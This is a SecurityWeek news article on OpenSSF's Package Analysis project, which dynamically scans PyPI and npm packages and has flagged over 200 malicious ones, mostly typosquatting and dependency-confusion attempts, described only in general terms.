Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Application Security

New OpenSSF Project Hunts for Malicious Packages in Open Source Repositories

The Open Source Security Foundation (OpenSSF) has announced a new project whose goal is to help identify malicious packages in open source repositories.

The Open Source Security Foundation (OpenSSF) has announced a new project whose goal is to help identify malicious packages in open source repositories.

The Package Analysis project, OpenSSF says, aims to identify the behavior and capabilities of open source packages – including files they access, commands they support, and IPs they connect to – and track modifications that could reveal suspicious activities.

“This effort is meant to improve the security of open source software by detecting malicious behavior, informing consumers selecting packages, and providing researchers with data about the ecosystem,” OpenSSF says.

Under development for a while, the project went through extensive changes and only recently became useful, the Foundation says.

Package Analysis dynamically investigates packages in popular open source repositories and places the results in a BigQuery table. The project has already identified more than 200 malicious PyPI and npm packages, but most of these were dependency confusion and typosquatting attacks.

The identified packages typically contained a simple script designed to run at install and send home a small amount of information on the host. However, they could prove far more hurtful to those who installed them.

According to OpenSSF, most of these malicious packages could be the work of security researchers, given that no meaningful data was being exfiltrated and that no attempt was made at disguising the behavior.

[ READ: Apache Foundation Calls Out Open-Source Leechers ]

Advertisement. Scroll to continue reading.

The Foundation calls for involvement in advancing the project, to improve behavioral detection, automate result processing, store packages processed for long-term analysis, and improve reliability.

Google, which has long advocated for a safer open source environment and which is a member of OpenSSF, has already announced support for the project.

“This program contributes to a more secure software supply chain and greater trust in open source software. The program also gives insight into the types of malicious packages that are most common at any given time, which can guide decisions about how to better protect the ecosystem,” Google says.

According to the internet giant, the short time that Package Analysis needed to identify malicious projects shows that more should be invested in vetting packages to keep users safe.

“This is a growing space, and having an open standard for reporting would help centralize analysis results and offer consumers a trusted place to assess the packages they’re considering using. Creating an open standard should also foster healthy competition, promote integration, and raise the overall security of open source packages,” Google concluded.

Related: Meta Releases Open Source Browser Extension for Checking Code Authenticity

Related: U.S. Government, Tech Giants Discuss Open Source Software Security

Related: Open Source Security Foundation Now Counts 60 Members

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Trending

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join the session as we discuss the challenges and best practices for cybersecurity leaders managing cloud identities.

Register

SecurityWeek’s Ransomware Resilience and Recovery Summit helps businesses to plan, prepare, and recover from a ransomware incident.

Register

Expert Insights

Related Content

Application Security

Cycode, a startup that provides solutions for protecting software source code, emerged from stealth mode on Tuesday with $4.6 million in seed funding.

Risk Management

The supply chain threat is directly linked to attack surface management, but the supply chain must be known and understood before it can be...

Cybersecurity Funding

2022 Cybersecurity Year in Review: Top news headlines and trends that impacted the security ecosystem

ICS/OT

The overall effect of current global geopolitical conditions is that nation states have a greater incentive to target the ICS/OT of critical industries, while...

Application Security

Virtualization technology giant VMware on Tuesday shipped urgent updates to fix a trio of security problems in multiple software products, including a virtual machine...

Application Security

Fortinet on Monday issued an emergency patch to cover a severe vulnerability in its FortiOS SSL-VPN product, warning that hackers have already exploited the...

Application Security

PayPal is alerting roughly 35,000 individuals that their accounts have been targeted in a credential stuffing campaign.